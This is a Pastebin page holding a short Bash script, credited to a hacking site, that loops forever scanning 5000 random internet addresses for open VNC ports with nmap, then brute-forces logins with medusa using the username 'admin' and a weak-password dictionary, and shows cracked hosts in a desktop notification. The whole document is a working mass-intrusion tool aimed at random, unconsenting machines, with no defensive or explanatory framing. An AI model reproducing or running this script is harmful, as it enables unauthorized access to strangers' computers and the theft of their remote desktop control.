Advertisement
Guest User

Untitled

a guest
Sep 9th, 2011
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.48 KB | None | 0 0
  1. # Created by Pathogen @ www.hakhub.tk
  2.  
  3. while true; do
  4. echo -e "\033[32;2;1mBegging scan for weak vnc sessions"
  5. nmap -iR 5000 -p 5900 --open -oG vnc | grep -B 3 open > vnsea
  6. java -jar ips.jar vnsea | uniq  >  vips
  7. echo -e "\033[1;35;1m"
  8. medusa -H vips -u admin -P /media/truecrypt1/Dictionaries/weak -e ns -f -v 6 -T 5 -O vncrack -M vnc
  9. notify-send "VNC Results" "` grep SUCCESS vncrack | awk '{print $5 " -> " $9 " "$10" "$11}' | tail `" -i /root/Scripts/telnet.jpg -t 3030
  10. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement